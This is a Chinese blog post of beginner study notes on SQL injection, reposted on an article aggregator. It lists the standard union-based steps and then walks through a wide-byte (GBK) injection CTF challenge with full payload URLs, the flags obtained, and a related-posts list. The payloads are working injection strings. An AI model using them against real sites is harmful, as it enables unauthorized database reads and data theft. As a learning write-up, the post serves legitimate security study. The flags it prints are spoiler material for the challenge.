2. 程式人生 > 其它 >SQL注入基礎學習筆記

SQL注入基礎學習筆記

阿新 發佈:2021-01-22

技術標籤:sql

SQL注入基礎

文章目錄

一、sql注入一般步驟

1.測試注入點是否存在,判斷為字元型還是數字型,如何閉合
輸入‘頁面報錯
or 1=1%23
and 1=1%23為真,and 1=2%23為假;
2.獲取查詢欄位數
用order by 語句進行排除
3.判斷可回顯得欄位位置
union select聯合查詢
4.獲取資料庫名等資訊
database(),version()等
5.獲取表名
information_schema.tables

?id=0 union select group_concat(table_name),2,…,n from information_schema.tables where table_schema=database()%23

通過information_schema庫中的tables表查詢當前資料庫的所有表資訊,group_concat()函式能夠將欄位值打印出來,以逗號分隔。

6.獲取表中欄位名
information_schema.columns

?id=0 union select group_concat(column_name),2,…,n from information_schema.columns where table_schema=database() and table_name='xxxx'%23

通過information_schema庫中的columns表查詢xxxx表的所有列資訊。

7.獲取所需資料

?id=0 union select group_concat(col1),group_concat(col2) from xxxx%23

直接聯合查詢xxxx表內col1,col2兩列所有資訊。

二、sql寬位元組注入練習

1.題目
2.解題步驟
(1)首先,這是寬位元組注入,用order by語句查詢欄位數,如圖查詢到3時顯示錯誤,所以欄位數為2;

http://chinalover.sinaapp.com/SQL-GBK/?id=1%df' order by 3%23

在這裡插入圖片描述
(2)聯合查詢判斷可回顯欄位位置

http://chinalover.sinaapp.com/SQL-GBK/?id=0%df' union select 1,2%23

在這裡插入圖片描述

(3)獲取資料庫名稱為sae-chinalover

http://chinalover.sinaapp.com/SQL-GBK/?id=0%df' union select 1,database()%23

在這裡插入圖片描述
(4)獲取表名

http://chinalover.sinaapp.com/SQL-GBK/?id=0%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database()%23

在這裡插入圖片描述
(5)查詢gbksqli表的所有列資訊
其中表名gbksqli要用十六進位制編碼為67626b73716c69並在前面加上0x後進行查詢

http://chinalover.sinaapp.com/SQL-GBK/?id=0%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 0x67626b73716c69%23

在這裡插入圖片描述
(6)聯合查詢gbksqli表內flag列資訊,得到flag為nctf{gbk_3sqli}

http://chinalover.sinaapp.com/SQL-GBK/?id=0%df' union select 1,group_concat(flag) from gbksqli%23

在這裡插入圖片描述
注:在其他表裡還有一個flag,方法同上,另一個flag為flag{this_is_sqli_flag}

相關推薦

SQL注入基礎學習筆記

技術標籤:sql SQL注入基礎 文章目錄 SQL注入基礎一、sql注入一般步驟二、sql寬位元組注入練習

SQL注入實驗學習筆記

實操靶場地址:SQL注入實驗一 根據指導書我們要先在實驗機進入這個網址http://10.1.1.11:81 進入之後會看到三個例項。例項一 根據指導書的提示來做這一題。後面兩個例項也要看這個指導書。 先判斷是否存在注

SQL基礎學習筆記<第三天>

技術標籤:資料庫學習mysql 3.1 SQL時間 SELECT paidTime, date( paidTime ), date_format( paidtime, \'%Y-%m-%d\' ),

SQL基礎學習筆記<第一天>

技術標籤:資料庫學習mysql資料庫 1.什麼是資料庫? 資料庫是資料儲存的集合 表是資料結構化的資訊 2.區分 MYSQL 是一個數據庫 SQL 資料查詢語句 3.SQL基礎語法 3.1 and,or語句 查詢城市為上海學歷為本科或者城市

Vue-基礎中的基礎-學習筆記

參考資料: Vue官方文件教程:https://cn.vuejs.org/v2/guide/installation.html 我現在做的工作的前端部分用到了Vue,但基本只是用一下Element UI,我也感覺Element UI框架很適合做一些xxx管理系統之類的東西。我

Python基礎學習筆記(07)檔案操作

Python基礎學習(08) 一、今日內容大綱 初識檔案操作 檔案操作的模式 檔案操作的其他功能

Python基礎學習筆記(10)形參 名稱空間

Python基礎學習(10) 形參 名稱空間 一、今日內容大綱 形參的補充內容 名稱空間(名稱空間)

Python基礎學習筆記(16)主要模組

Python基礎學習(16)主要模組 一、今日內容大綱 time 模組 datetime 模組 os 模組 sys 模組

Python基礎學習筆記(17) 軟體開發規範

軟體開發規範 一、為什麼要有軟體開發規範? app 軟體 不可能全部都寫在一個檔案中,載入效率低,不容易查詢,不規範。程式碼越多,你越不能放在一個檔案中,你需要將你的程式碼分成多個檔案,軟體開發規範應運而生。

Python基礎學習筆記(19)re 模組 遞迴函式 帶引數的裝飾器

Python基礎學習(19)re 模組Ⅱ、遞迴函式、帶引數的裝飾器 一、今日大綱 re 模組

Python基礎學習筆記(20)遞迴詳解 shutil 模組 logging 模組

Python基礎學習(20)遞迴詳解 shutil 模組 logging 模組 一、今日大綱 遞迴詳解 shutil 模組

Python基礎學習筆記(21)二分查詢 os.walk() 面向物件基礎

Python基礎學習(21)二分查詢 os.walk() 面向物件基礎 一、今日大綱 遞迴演算法的擴充套件:二分查詢

Python基礎學習筆記(22)面向物件的名稱空間 組合

Python基礎學習(22)面向物件的名稱空間 組合 一、今日大綱 面向物件的名稱空間

Python基礎學習筆記(23)繼承 類部分屬性的補充 方法和函式 利用 pickle 儲存物件

Python基礎學習(23)繼承 類部分屬性的補充 方法和函式 利用 pickle 儲存物件 一、今日大綱

Python基礎學習筆記(24)利用類理解queue和stack 經典類與新式類 抽象類 多型 鴨子型別

Python基礎學習(24)利用類理解queue和stack 經典類與新式類 抽象類 多型 鴨子型別

Python基礎學習筆記(25)super方法 封裝 property裝飾器 反射

Python基礎學習(25)super方法 封裝 property裝飾器 反射 一、今日內容大綱 super 方法(繼承內容補充)

sql注入的一些筆記

SQL注入詳解 據不完全統計,國內網站ASP+Access或SQLServer佔70%以上,PHP+MySQL佔20%。

Rust基礎學習筆記(二):自動測試

本文介紹Rust的自動測試機制。 如何編寫測試 測試是一些用來確定程式碼正常執行的函式。通過對一些數值運算後得到預期的結果來實現。

Java基礎學習筆記-String&StringBuilder

Java基礎筆記- String API概述 Java API:指的就是JDK中提供的各種功能的Java類,這些類將底層的實現封裝了起來,我們不需要關心這些類是如何實現的,只需要學習這些類如何使用即可,我們可以通過幫助文件來學習這些

Java基礎[學習筆記]

Java基礎 0. Hello World //HelloWorld.java public class HelloWorld { public static void main(String[] args) {